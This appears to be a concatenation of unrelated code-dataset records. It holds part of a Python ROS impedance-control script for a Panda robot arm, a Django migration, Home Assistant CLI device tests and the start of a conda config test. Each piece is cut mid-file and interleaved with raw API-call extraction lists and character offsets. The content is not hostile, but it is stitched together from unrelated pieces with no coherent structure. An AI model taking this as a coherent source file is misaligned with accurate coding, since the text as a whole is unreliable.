alpha_e = a_d_e + np.dot(np.linalg.inv(M),(np.dot(B,v_d_e.reshape([6,1])-np.dot(Rot_e_bigdim,x_dot).reshape([6,1]))+h_delta_e-h_e_e)).reshape([6,1])
alpha = np.dot(Rot_e_bigdim.T,alpha_e).reshape([6,1])+np.dot(Rot_e_dot_bigdim.T,np.dot(Rot_e_bigdim,x_dot)).reshape([6,1])
torque = np.linalg.multi_dot([J.T,get_W(inv=True),alpha]).reshape((7,1)) + np.array(robot.coriolis_comp().reshape((7,1))) + np.dot(J.T,h_e).reshape((7,1))
robot.set_joint_torques(dict(list(zip(robot.joint_names(),torque))))
"""
TESTING AREA
"""
# -------------- Plotting ------------------------
def plot_result(v_num, v,p,p_d, delta_x, F_ext,F_d, z_dynamics,M,B,K, T):
time_array = np.arange(len(p[0]))*T
plt.subplot(211)
plt.title("External force")
plt.plot(time_array, F_ext[2], label="force z [N]")
plt.plot(time_array, F_d[2], label="desired force z [N]", color='b',linestyle='dashed')
plt.xlabel("Real time [s]")
plt.legend()
plt.subplot(212)
plt.title("Position")
plt.plot(time_array, p[0,:], label = "true x [m]")
plt.plot(time_array, p[1,:], label = "true y [m]")
plt.plot(time_array, p[2,:], label = "true z [m]")
plt.plot(time_array, p_d[0,:], label = "desired x [m]", color='b',linestyle='dashed')
plt.plot(time_array, p_d[1,:], label = "desired y [m]", color='C1',linestyle='dashed')
plt.plot(time_array, p_d[2,:], label = "desired z [m]", color='g',linestyle='dashed')
plt.xlabel("Real time [s]")
plt.legend()
"""
plt.subplot(233)
plt.title("Orientation error in Euler")
plt.plot(time_array, delta_x[3]*(180/np.pi), label = "error Ori_x [degrees]")
plt.plot(time_array, delta_x[4]*(180/np.pi), label = "error Ori_y [degrees]")
plt.plot(time_array, delta_x[5]*(180/np.pi), label = "error Ori_z [degrees]")
plt.xlabel("Real time [s]")
plt.legend()
plt.subplot(234)
plt.title("Adaptive dynamics along the z-axis")
plt.plot(time_array, z_dynamics[0], label = "inertia (M_z)")
plt.plot(time_array, z_dynamics[1], label = "damping (B_z)")
plt.plot(time_array, z_dynamics[2], label = "stiffness (K_z)")
plt.axhline(y=M[2][2], label = "initial inertia (M_z)", color='b',linestyle='dashed')
plt.axhline(y=B[2][2], label = "initial damping (B_z)", color='C1',linestyle='dashed')
plt.axhline(y=K[2][2], label = "initial stiffness (K_z)", color='g',linestyle='dashed')
plt.xlabel("Real time [s]")
plt.legend()
plt.subplot(235)
plt.title("velocity read from rostopic")
plt.plot(time_array, v[0], label = "vel x")
plt.plot(time_array, v[1], label = "vel y")
plt.plot(time_array, v[2], label = "vel z")
plt.plot(time_array, v[3], label = "ang x")
plt.plot(time_array, v[4], label = "ang y")
plt.plot(time_array, v[5], label = "ang z")
plt.xlabel("Real time [s]")
plt.legend()
plt.subplot(236)
plt.title("numerically calculated velocity")
plt.plot(time_array, v_num[0], label = "vel x")
plt.plot(time_array, v_num[1], label = "vel y")
plt.plot(time_array, v_num[2], label = "vel z")
plt.plot(time_array, v_num[3], label = "ang x")
plt.plot(time_array, v_num[4], label = "ang y")
plt.plot(time_array, v_num[5], label = "ang z")
plt.xlabel("Real time [s]")
plt.legend()
"""
plt.show()
if __name__ == "__main__":
# ---------- Initialization -------------------
rospy.init_node("impedance_control")
robot = PandaArm()
publish_rate = 250
rate = rospy.Rate(publish_rate)
T = 0.001*(1000/publish_rate)
max_num_it = int(duration /T)
#robot.move_to_joint_positions(new_start)
robot.move_to_neutral()
# List used to contain data needed for calculation of the torque output
lam = np.zeros(18)
v_history = np.zeros((6,max_num_it))
# Lists providing data for plotting
p_history = np.zeros((3,max_num_it))
v_history_num = np.zeros((6,max_num_it))
x_history = np.zeros((6,max_num_it))
delta_x_history = np.zeros((6,max_num_it))
F_ext_history = np.zeros((6,max_num_it))
z_dynamics_history = np.zeros((3,max_num_it))
# Specify the desired behaviour of the robot
x_d_ddot, x_d_dot, p_d = generate_desired_trajectory_tc(max_num_it,T,move_in_x = True)
goal_ori = np.asarray(robot.endpoint_pose()['orientation']) # goal orientation = current (initial) orientation [remains the same the entire duration of the run]
Rot_d = robot.endpoint_pose()['orientation_R'] # used by the DeSchutter implementation
F_d = generate_F_d_tc(max_num_it,T)
# ----------- The control loop -----------
for i in range(max_num_it):
# update state-lists
p_history[:,i] = get_p()
x_history[:,i] = get_x(goal_ori)
delta_x_history[:,i] = get_delta_x(goal_ori,p_d[:,i])
F_ext_history[:,i] = get_F_ext()
x_dot = get_x_dot(x_history,i,T, numerically=False) #chose 'numerically' either 'True' or 'False'
v_history_num[:,i] = get_x_dot(x_history,i,T, numerically=True) # only for plotting
v_history[:,i] = get_x_dot(x_history,i,T) # for calculating error in acceleration
# adapt M,B and K
xi = get_xi(goal_ori, p_d[:,i],x_dot, x_d_dot[:,i], x_d_ddot[:,i], v_history, i, T)
lam = lam.reshape([18,1]) + get_lambda_dot(gamma,xi,K_v,P,F_d[:,i]).reshape([18,1])*T
M_hat,B_hat,K_hat = update_MBK_hat(lam,M,B,K)
# Apply the resulting torque to the robot
"""CHOOSE ONE OF THE TWO CONTROLLERS BELOW"""
perform_torque_Huang1992(M_hat, B_hat, K_hat, x_d_ddot[:,i], x_d_dot[:,i],x_dot, p_d[:,i], goal_ori)
#perform_torque_DeSchutter(M_hat, B_hat, K_hat, x_d_ddot[:,i], x_d_dot[:,i],x_dot, p_d[:,i], Rot_d)
rate.sleep()
# plotting and printing
z_dynamics_history[0][i]=M_hat[2][2]
z_dynamics_history[1][i]=B_hat[2][2]
z_dynamics_history[2][i]=K_hat[2][2]
# Live printing to screen when the controller is running
if i%100 == 0:
print(i,'/',max_num_it,' = ',T*i,' [s] ) Force in z: ',F_ext_history[2,i])
print(K_hat[2][2])
print('')
#Uncomment the block below to save plotting-data
"""
np.save('VIC_p_d.npy',p_d)
np.save('VIC_p.npy',p_history)
np.save('VIC_Fz_d.npy',F_d)
np.save('VIC_Fz.npy',F_ext_history[2])
np.save('VIC_delta_x.npy',delta_x_history) #orientation error in radians
np.save('VIC_adaptive_gains.npy',z_dynamics_history)
"""
plot_result(v_history_num,v_history, p_history, p_d, delta_x_history, F_ext_history, F_d, z_dynamics_history,M,B,K, T)
| [
"numpy.block",
"quaternion.as_float_array",
"numpy.linalg.multi_dot",
"rospy.init_node",
"numpy.array",
"rospy.Rate",
"numpy.sin",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.plot",
"numpy.subtract",
"numpy.dot",
"numpy.diagflat",
"panda_robot.PandaArm",
"numpy.identity",
"quaternion.from_rotation_matrix",
"matplotlib.pyplot.title",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.show",
"numpy.set_printoptions",
"quaternion.as_rotation_matrix",
"numpy.append",
"numpy.zeros",
"numpy.linalg.inv",
"matplotlib.pyplot.subplot"
]
| [((353, 385), 'numpy.set_printoptions', 'np.set_printoptions', ([], {'precision': '(2)'}), '(precision=2)\n', (372, 385), True, 'import numpy as np\n'), ((2012, 2154), 'numpy.array', 'np.array', (['[[Kp, 0, 0, 0, 0, 0], [0, Kp, 0, 0, 0, 0], [0, 0, Kpz, 0, 0, 0], [0, 0, 0,\n Ko, 0, 0], [0, 0, 0, 0, Ko, 0], [0, 0, 0, 0, 0, Ko]]'], {}), '([[Kp, 0, 0, 0, 0, 0], [0, Kp, 0, 0, 0, 0], [0, 0, Kpz, 0, 0, 0], [\n 0, 0, 0, Ko, 0, 0], [0, 0, 0, 0, Ko, 0], [0, 0, 0, 0, 0, Ko]])\n', (2020, 2154), True, 'import numpy as np\n'), ((2301, 2443), 'numpy.array', 'np.array', (['[[Bp, 0, 0, 0, 0, 0], [0, Bp, 0, 0, 0, 0], [0, 0, Bpz, 0, 0, 0], [0, 0, 0,\n Bo, 0, 0], [0, 0, 0, 0, Bo, 0], [0, 0, 0, 0, 0, Bo]]'], {}), '([[Bp, 0, 0, 0, 0, 0], [0, Bp, 0, 0, 0, 0], [0, 0, Bpz, 0, 0, 0], [\n 0, 0, 0, Bo, 0, 0], [0, 0, 0, 0, Bo, 0], [0, 0, 0, 0, 0, Bo]])\n', (2309, 2443), True, 'import numpy as np\n'), ((2564, 2598), 'numpy.array', 'np.array', (['[Mp, Mp, Mp, Mo, Mo, Mo]'], {}), '([Mp, Mp, Mp, Mo, Mo, Mo])\n', (2572, 2598), True, 'import numpy as np\n'), ((2598, 2617), 'numpy.diagflat', 'np.diagflat', (['M_diag'], {}), '(M_diag)\n', (2609, 2617), True, 'import numpy as np\n'), ((2687, 2701), 'numpy.identity', 'np.identity', (['(6)'], {}), '(6)\n', (2698, 2701), True, 'import numpy as np\n'), ((2706, 2720), 'numpy.identity', 'np.identity', (['(6)'], {}), '(6)\n', (2717, 2720), True, 'import numpy as np\n'), ((2729, 2744), 'numpy.identity', 'np.identity', (['(18)'], {}), '(18)\n', (2740, 2744), True, 'import numpy as np\n'), ((3226, 3251), 'numpy.zeros', 'np.zeros', (['(6, iterations)'], {}), '((6, iterations))\n', (3234, 3251), True, 'import numpy as np\n'), ((3259, 3284), 'numpy.zeros', 'np.zeros', (['(6, iterations)'], {}), '((6, iterations))\n', (3267, 3284), True, 'import numpy as np\n'), ((3292, 3317), 'numpy.zeros', 'np.zeros', (['(3, iterations)'], {}), '((3, iterations))\n', (3300, 3317), True, 'import numpy as np\n'), ((3815, 3840), 'numpy.zeros', 'np.zeros', (['(6, iterations)'], {}), '((6, iterations))\n', (3823, 3840), True, 'import numpy as np\n'), ((3848, 3873), 'numpy.zeros', 'np.zeros', (['(6, iterations)'], {}), '((6, iterations))\n', (3856, 3873), True, 'import numpy as np\n'), ((3881, 3906), 'numpy.zeros', 'np.zeros', (['(3, iterations)'], {}), '((3, iterations))\n', (3889, 3906), True, 'import numpy as np\n'), ((4409, 4434), 'numpy.zeros', 'np.zeros', (['(6, iterations)'], {}), '((6, iterations))\n', (4417, 4434), True, 'import numpy as np\n'), ((4442, 4467), 'numpy.zeros', 'np.zeros', (['(6, iterations)'], {}), '((6, iterations))\n', (4450, 4467), True, 'import numpy as np\n'), ((4475, 4500), 'numpy.zeros', 'np.zeros', (['(3, iterations)'], {}), '((3, iterations))\n', (4483, 4500), True, 'import numpy as np\n'), ((5055, 5080), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (5063, 5080), True, 'import numpy as np\n'), ((5088, 5113), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (5096, 5113), True, 'import numpy as np\n'), ((5121, 5146), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (5129, 5146), True, 'import numpy as np\n'), ((5755, 5780), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (5763, 5780), True, 'import numpy as np\n'), ((5788, 5813), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (5796, 5813), True, 'import numpy as np\n'), ((5821, 5846), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (5829, 5846), True, 
'import numpy as np\n'), ((6455, 6480), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (6463, 6480), True, 'import numpy as np\n'), ((6488, 6513), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (6496, 6513), True, 'import numpy as np\n'), ((6521, 6546), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (6529, 6546), True, 'import numpy as np\n'), ((8604, 8629), 'numpy.append', 'np.append', (['pos_x', 'rel_ori'], {}), '(pos_x, rel_ori)\n', (8613, 8629), True, 'import numpy as np\n'), ((10262, 10302), 'quaternion.as_rotation_matrix', 'quaternion.as_rotation_matrix', (['quat_curr'], {}), '(quat_curr)\n', (10291, 10302), False, 'import quaternion\n'), ((10317, 10356), 'quaternion.as_rotation_matrix', 'quaternion.as_rotation_matrix', (['quat_des'], {}), '(quat_des)\n', (10346, 10356), False, 'import quaternion\n'), ((10410, 10450), 'quaternion.from_rotation_matrix', 'quaternion.from_rotation_matrix', (['rel_mat'], {}), '(rel_mat)\n', (10441, 10450), False, 'import quaternion\n'), ((10924, 10938), 'numpy.diagflat', 'np.diagflat', (['E'], {}), '(E)\n', (10935, 10938), True, 'import numpy as np\n'), ((10956, 10974), 'numpy.diagflat', 'np.diagflat', (['E_dot'], {}), '(E_dot)\n', (10967, 10974), True, 'import numpy as np\n'), ((10993, 11012), 'numpy.diagflat', 'np.diagflat', (['E_ddot'], {}), '(E_ddot)\n', (11004, 11012), True, 'import numpy as np\n'), ((11024, 11067), 'numpy.block', 'np.block', (['[E_ddot_diag, E_dot_diag, E_diag]'], {}), '([E_ddot_diag, E_dot_diag, E_diag])\n', (11032, 11067), True, 'import numpy as np\n'), ((12647, 12746), 'numpy.array', 'np.array', (['[[0, -vector[2], vector[1]], [vector[2], 0, -vector[0]], [-vector[1],\n vector[0], 0]]'], {}), '([[0, -vector[2], vector[1]], [vector[2], 0, -vector[0]], [-vector[\n 1], vector[0], 0]])\n', (12655, 12746), True, 'import numpy as np\n'), ((13572, 13588), 'numpy.zeros', 'np.zeros', (['(3, 1)'], {}), '((3, 1))\n', (13580, 13588), True, 'import numpy as np\n'), ((14337, 14371), 'numpy.array', 'np.array', (['[quat.x, quat.y, quat.z]'], {}), '([quat.x, quat.y, quat.z])\n', (14345, 14371), True, 'import numpy as np\n'), ((14453, 14478), 'numpy.dot', 'np.dot', (['Rot_e.T', 'quat_e_e'], {}), '(Rot_e.T, quat_e_e)\n', (14459, 14478), True, 'import numpy as np\n'), ((15770, 15786), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(211)'], {}), '(211)\n', (15781, 15786), True, 'import matplotlib.pyplot as plt\n'), ((15791, 15818), 'matplotlib.pyplot.title', 'plt.title', (['"""External force"""'], {}), "('External force')\n", (15800, 15818), True, 'import matplotlib.pyplot as plt\n'), ((15823, 15874), 'matplotlib.pyplot.plot', 'plt.plot', (['time_array', 'F_ext[2]'], {'label': '"""force z [N]"""'}), "(time_array, F_ext[2], label='force z [N]')\n", (15831, 15874), True, 'import matplotlib.pyplot as plt\n'), ((15879, 15971), 'matplotlib.pyplot.plot', 'plt.plot', (['time_array', 'F_d[2]'], {'label': '"""desired force z [N]"""', 'color': '"""b"""', 'linestyle': '"""dashed"""'}), "(time_array, F_d[2], label='desired force z [N]', color='b',\n linestyle='dashed')\n", (15887, 15971), True, 'import matplotlib.pyplot as plt\n'), ((15971, 15998), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Real time [s]"""'], {}), "('Real time [s]')\n", (15981, 15998), True, 'import matplotlib.pyplot as plt\n'), ((16003, 16015), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (16013, 16015), True, 'import matplotlib.pyplot as plt\n'), ((16022, 16038), 
'matplotlib.pyplot.subplot', 'plt.subplot', (['(212)'], {}), '(212)\n', (16033, 16038), True, 'import matplotlib.pyplot as plt\n'), ((16043, 16064), 'matplotlib.pyplot.title', 'plt.title', (['"""Position"""'], {}), "('Position')\n", (16052, 16064), True, 'import matplotlib.pyplot as plt\n'), ((16069, 16118), 'matplotlib.pyplot.plot', 'plt.plot', (['time_array', 'p[0, :]'], {'label': '"""true x [m]"""'}), "(time_array, p[0, :], label='true x [m]')\n", (16077, 16118), True, 'import matplotlib.pyplot as plt\n'), ((16124, 16173), 'matplotlib.pyplot.plot', 'plt.plot', (['time_array', 'p[1, :]'], {'label': '"""true y [m]"""'}), "(time_array, p[1, :], label='true y [m]')\n", (16132, 16173), True, 'import matplotlib.pyplot as plt\n'), ((16179, 16228), 'matplotlib.pyplot.plot', 'plt.plot', (['time_array', 'p[2, :]'], {'label': '"""true z [m]"""'}), "(time_array, p[2, :], label='true z [m]')\n", (16187, 16228), True, 'import matplotlib.pyplot as plt\n'), ((16235, 16325), 'matplotlib.pyplot.plot', 'plt.plot', (['time_array', 'p_d[0, :]'], {'label': '"""desired x [m]"""', 'color': '"""b"""', 'linestyle': '"""dashed"""'}), "(time_array, p_d[0, :], label='desired x [m]', color='b', linestyle\n ='dashed')\n", (16243, 16325), True, 'import matplotlib.pyplot as plt\n'), ((16325, 16415), 'matplotlib.pyplot.plot', 'plt.plot', (['time_array', 'p_d[1, :]'], {'label': '"""desired y [m]"""', 'color': '"""C1"""', 'linestyle': '"""dashed"""'}), "(time_array, p_d[1, :], label='desired y [m]', color='C1',\n linestyle='dashed')\n", (16333, 16415), True, 'import matplotlib.pyplot as plt\n'), ((16416, 16506), 'matplotlib.pyplot.plot', 'plt.plot', (['time_array', 'p_d[2, :]'], {'label': '"""desired z [m]"""', 'color': '"""g"""', 'linestyle': '"""dashed"""'}), "(time_array, p_d[2, :], label='desired z [m]', color='g', linestyle\n ='dashed')\n", (16424, 16506), True, 'import matplotlib.pyplot as plt\n'), ((16506, 16533), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Real time [s]"""'], {}), "('Real time [s]')\n", (16516, 16533), True, 'import matplotlib.pyplot as plt\n'), ((16538, 16550), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (16548, 16550), True, 'import matplotlib.pyplot as plt\n'), ((18369, 18379), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (18377, 18379), True, 'import matplotlib.pyplot as plt\n'), ((18469, 18505), 'rospy.init_node', 'rospy.init_node', (['"""impedance_control"""'], {}), "('impedance_control')\n", (18484, 18505), False, 'import rospy\n'), ((18518, 18528), 'panda_robot.PandaArm', 'PandaArm', ([], {}), '()\n', (18526, 18528), False, 'from panda_robot import PandaArm\n'), ((18563, 18587), 'rospy.Rate', 'rospy.Rate', (['publish_rate'], {}), '(publish_rate)\n', (18573, 18587), False, 'import rospy\n'), ((18825, 18837), 'numpy.zeros', 'np.zeros', (['(18)'], {}), '(18)\n', (18833, 18837), True, 'import numpy as np\n'), ((18854, 18879), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (18862, 18879), True, 'import numpy as np\n'), ((18936, 18961), 'numpy.zeros', 'np.zeros', (['(3, max_num_it)'], {}), '((3, max_num_it))\n', (18944, 18961), True, 'import numpy as np\n'), ((18981, 19006), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (18989, 19006), True, 'import numpy as np\n'), ((19022, 19047), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (19030, 19047), True, 'import numpy as np\n'), ((19069, 19094), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (19077, 
19094), True, 'import numpy as np\n'), ((19114, 19139), 'numpy.zeros', 'np.zeros', (['(6, max_num_it)'], {}), '((6, max_num_it))\n', (19122, 19139), True, 'import numpy as np\n'), ((19164, 19189), 'numpy.zeros', 'np.zeros', (['(3, max_num_it)'], {}), '((3, max_num_it))\n', (19172, 19189), True, 'import numpy as np\n'), ((7509, 7523), 'numpy.zeros', 'np.zeros', (['size'], {}), '(size)\n', (7517, 7523), True, 'import numpy as np\n'), ((8012, 8028), 'numpy.linalg.inv', 'np.linalg.inv', (['W'], {}), '(W)\n', (8025, 8028), True, 'import numpy as np\n'), ((9462, 9493), 'numpy.append', 'np.append', (['delta_pos', 'delta_ori'], {}), '(delta_pos, delta_ori)\n', (9471, 9493), True, 'import numpy as np\n'), ((10461, 10496), 'quaternion.as_float_array', 'quaternion.as_float_array', (['rel_quat'], {}), '(rel_quat)\n', (10486, 10496), False, 'import quaternion\n'), ((11481, 11503), 'numpy.diagflat', 'np.diagflat', (['lam[6:12]'], {}), '(lam[6:12])\n', (11492, 11503), True, 'import numpy as np\n'), ((11520, 11543), 'numpy.diagflat', 'np.diagflat', (['lam[12:18]'], {}), '(lam[12:18])\n', (11531, 11543), True, 'import numpy as np\n'), ((14189, 14211), 'numpy.dot', 'np.dot', (['Rot_e.T', 'Rot_d'], {}), '(Rot_e.T, Rot_d)\n', (14195, 14211), True, 'import numpy as np\n'), ((14916, 14941), 'numpy.dot', 'np.dot', (['Rot_e_bigdim', 'h_e'], {}), '(Rot_e_bigdim, h_e)\n', (14922, 14941), True, 'import numpy as np\n'), ((7425, 7486), 'numpy.subtract', 'np.subtract', (['history[:, iteration]', 'history[:, iteration - 1]'], {}), '(history[:, iteration], history[:, iteration - 1])\n', (7436, 7486), True, 'import numpy as np\n'), ((11226, 11244), 'numpy.linalg.inv', 'np.linalg.inv', (['K_v'], {}), '(K_v)\n', (11239, 11244), True, 'import numpy as np\n'), ((11887, 11903), 'numpy.linalg.inv', 'np.linalg.inv', (['M'], {}), '(M)\n', (11900, 11903), True, 'import numpy as np\n'), ((13232, 13246), 'numpy.identity', 'np.identity', (['(3)'], {}), '(3)\n', (13243, 13246), True, 'import numpy as np\n'), ((13480, 13505), 'numpy.dot', 'np.dot', (['K_pt_dot', 'p_delta'], {}), '(K_pt_dot, p_delta)\n', (13486, 13505), True, 'import numpy as np\n'), ((13533, 13559), 'numpy.dot', 'np.dot', (['K_pt_ddot', 'p_delta'], {}), '(K_pt_ddot, p_delta)\n', (13539, 13559), True, 'import numpy as np\n'), ((13614, 13638), 'numpy.dot', 'np.dot', (['K_po_dot', 'quat_e'], {}), '(K_po_dot, quat_e)\n', (13620, 13638), True, 'import numpy as np\n'), ((14955, 14985), 'numpy.dot', 'np.dot', (['Rot_e_bigdim', 'x_d_ddot'], {}), '(Rot_e_bigdim, x_d_ddot)\n', (14961, 14985), True, 'import numpy as np\n'), ((15012, 15041), 'numpy.dot', 'np.dot', (['Rot_e_bigdim', 'x_d_dot'], {}), '(Rot_e_bigdim, x_d_dot)\n', (15018, 15041), True, 'import numpy as np\n'), ((11200, 11220), 'numpy.linalg.inv', 'np.linalg.inv', (['gamma'], {}), '(gamma)\n', (11213, 11220), True, 'import numpy as np\n'), ((12164, 12178), 'numpy.identity', 'np.identity', (['(6)'], {}), '(6)\n', (12175, 12178), True, 'import numpy as np\n'), ((12851, 12867), 'numpy.zeros', 'np.zeros', (['(3, 3)'], {}), '((3, 3))\n', (12859, 12867), True, 'import numpy as np\n'), ((12869, 12885), 'numpy.zeros', 'np.zeros', (['(3, 3)'], {}), '((3, 3))\n', (12877, 12885), True, 'import numpy as np\n'), ((15221, 15252), 'numpy.dot', 'np.dot', (['Rot_e_bigdim.T', 'alpha_e'], {}), '(Rot_e_bigdim.T, alpha_e)\n', (15227, 15252), True, 'import numpy as np\n'), ((15464, 15480), 'numpy.dot', 'np.dot', (['J.T', 'h_e'], {}), '(J.T, h_e)\n', (15470, 15480), True, 'import numpy as np\n'), ((5424, 5466), 'numpy.sin', 'np.sin', (['(it 
* T / 4 * 2 * np.pi + np.pi / 2)'], {}), '(it * T / 4 * 2 * np.pi + np.pi / 2)\n', (5430, 5466), True, 'import numpy as np\n'), ((6120, 6166), 'numpy.sin', 'np.sin', (['(2 * it * T / 4 * 2 * np.pi + np.pi / 2)'], {}), '(2 * it * T / 4 * 2 * np.pi + np.pi / 2)\n', (6126, 6166), True, 'import numpy as np\n'), ((6935, 6981), 'numpy.sin', 'np.sin', (['(2 * it * T / 4 * 2 * np.pi + np.pi / 2)'], {}), '(2 * it * T / 4 * 2 * np.pi + np.pi / 2)\n', (6941, 6981), True, 'import numpy as np\n'), ((12202, 12218), 'numpy.linalg.inv', 'np.linalg.inv', (['M'], {}), '(M)\n', (12215, 12218), True, 'import numpy as np\n'), ((12953, 12992), 'numpy.linalg.multi_dot', 'np.linalg.multi_dot', (['[R_d, K_pt, R_d.T]'], {}), '([R_d, K_pt, R_d.T])\n', (12972, 12992), True, 'import numpy as np\n'), ((12995, 13034), 'numpy.linalg.multi_dot', 'np.linalg.multi_dot', (['[R_e, K_pt, R_e.T]'], {}), '([R_e, K_pt, R_e.T])\n', (13014, 13034), True, 'import numpy as np\n'), ((13666, 13701), 'numpy.append', 'np.append', (['f_delta_t.T', 'm_delta_t.T'], {}), '(f_delta_t.T, m_delta_t.T)\n', (13675, 13701), True, 'import numpy as np\n'), ((13717, 13747), 'numpy.append', 'np.append', (['null.T', 'm_delta_o.T'], {}), '(null.T, m_delta_o.T)\n', (13726, 13747), True, 'import numpy as np\n'), ((15085, 15101), 'numpy.linalg.inv', 'np.linalg.inv', (['M'], {}), '(M)\n', (15098, 15101), True, 'import numpy as np\n'), ((15293, 15320), 'numpy.dot', 'np.dot', (['Rot_e_bigdim', 'x_dot'], {}), '(Rot_e_bigdim, x_dot)\n', (15299, 15320), True, 'import numpy as np\n'), ((9388, 9419), 'numpy.append', 'np.append', (['delta_pos', 'delta_ori'], {}), '(delta_pos, delta_ori)\n', (9397, 9419), True, 'import numpy as np\n'), ((11924, 11943), 'numpy.dot', 'np.dot', (['M', 'x_d_ddot'], {}), '(M, x_d_ddot)\n', (11930, 11943), True, 'import numpy as np\n'), ((12265, 12277), 'numpy.dot', 'np.dot', (['a', 'b'], {}), '(a, b)\n', (12271, 12277), True, 'import numpy as np\n'), ((15133, 15160), 'numpy.dot', 'np.dot', (['Rot_e_bigdim', 'x_dot'], {}), '(Rot_e_bigdim, x_dot)\n', (15139, 15160), True, 'import numpy as np\n')] |
# Generated by Django 2.2.9 on 2020-01-28 14:50
import django.utils.timezone
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("tests", "0009_auto_20200113_1239"),
]
operations = [
migrations.AddField(
model_name="modeltest",
name="datetime_field1",
field=models.DateTimeField(default=django.utils.timezone.now),
preserve_default=False,
),
]
| [
"django.db.models.DateTimeField"
]
| [((373, 428), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'django.utils.timezone.now'}), '(default=django.utils.timezone.now)\n', (393, 428), False, 'from django.db import migrations, models\n')] |
"""Testing Device operations."""
import json
import unittest.mock as mock
from click.testing import CliRunner
import homeassistant_cli.cli as cli
def test_device_list(default_devices) -> None:
"""Test Device List."""
with mock.patch(
'homeassistant_cli.remote.get_devices', return_value=default_devices
):
runner = CliRunner()
result = runner.invoke(
cli.cli,
["--output=json", "device", "list"],
catch_exceptions=False,
)
assert result.exit_code == 0
data = json.loads(result.output)
assert len(data) == 23
def test_device_list_filter(default_devices) -> None:
"""Test Device List."""
with mock.patch(
'homeassistant_cli.remote.get_devices', return_value=default_devices
):
runner = CliRunner()
result = runner.invoke(
cli.cli,
["--output=json", "device", "list", "table"],
catch_exceptions=False,
)
assert result.exit_code == 0
data = json.loads(result.output)
assert len(data) == 2
assert data[0]['name'] == "Kitchen table left"
assert data[1]['name'] == "Kitchen table right"
def test_device_assign(default_areas, default_devices) -> None:
"""Test basic device assign."""
with mock.patch(
'homeassistant_cli.remote.get_devices', return_value=default_devices
):
with mock.patch(
'homeassistant_cli.remote.get_areas', return_value=default_areas
):
with mock.patch(
'homeassistant_cli.remote.assign_area',
return_value={'success': True},
):
runner = CliRunner()
result = runner.invoke(
cli.cli,
["device", "assign", "Kitchen", "Kitchen table left"],
catch_exceptions=False,
)
print(result.output)
assert result.exit_code == 0
expected = (
"Successfully assigned 'Kitchen'"
" to 'Kitchen table left'\n"
)
assert result.output == expected
| [
"json.loads",
"unittest.mock.patch",
"click.testing.CliRunner"
]
| [((234, 319), 'unittest.mock.patch', 'mock.patch', (['"""homeassistant_cli.remote.get_devices"""'], {'return_value': 'default_devices'}), "('homeassistant_cli.remote.get_devices', return_value=default_devices\n )\n", (244, 319), True, 'import unittest.mock as mock\n'), ((348, 359), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (357, 359), False, 'from click.testing import CliRunner\n'), ((561, 586), 'json.loads', 'json.loads', (['result.output'], {}), '(result.output)\n', (571, 586), False, 'import json\n'), ((711, 796), 'unittest.mock.patch', 'mock.patch', (['"""homeassistant_cli.remote.get_devices"""'], {'return_value': 'default_devices'}), "('homeassistant_cli.remote.get_devices', return_value=default_devices\n )\n", (721, 796), True, 'import unittest.mock as mock\n'), ((825, 836), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (834, 836), False, 'from click.testing import CliRunner\n'), ((1047, 1072), 'json.loads', 'json.loads', (['result.output'], {}), '(result.output)\n', (1057, 1072), False, 'import json\n'), ((1325, 1410), 'unittest.mock.patch', 'mock.patch', (['"""homeassistant_cli.remote.get_devices"""'], {'return_value': 'default_devices'}), "('homeassistant_cli.remote.get_devices', return_value=default_devices\n )\n", (1335, 1410), True, 'import unittest.mock as mock\n'), ((1434, 1510), 'unittest.mock.patch', 'mock.patch', (['"""homeassistant_cli.remote.get_areas"""'], {'return_value': 'default_areas'}), "('homeassistant_cli.remote.get_areas', return_value=default_areas)\n", (1444, 1510), True, 'import unittest.mock as mock\n'), ((1551, 1637), 'unittest.mock.patch', 'mock.patch', (['"""homeassistant_cli.remote.assign_area"""'], {'return_value': "{'success': True}"}), "('homeassistant_cli.remote.assign_area', return_value={'success':\n True})\n", (1561, 1637), True, 'import unittest.mock as mock\n'), ((1708, 1719), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (1717, 1719), False, 'from click.testing import CliRunner\n')] |
# (c) 2012-2014 Continuum Analytics, Inc. / http://continuum.io
# All Rights Reserved
#
# conda is distributed under the terms of the BSD 3-clause license.
# Consult LICENSE.txt or http://opensource.org/licenses/BSD-3-Clause.
import os
from os.path import dirname, join, exists
import unittest
import pytest
import conda.config as config
from conda.utils import get_yaml
from conda.compat import iterkeys
from tests.helpers import run_conda_command
yaml = get_yaml()
# use condarc from source tree to run these tests against
config.rc_path = join(dirname(__file__), 'condarc')
def _get_default_urls():
return ['http://repo.continuum.io/pkgs/free',
'http://repo.continuum.io/pkgs/pro']
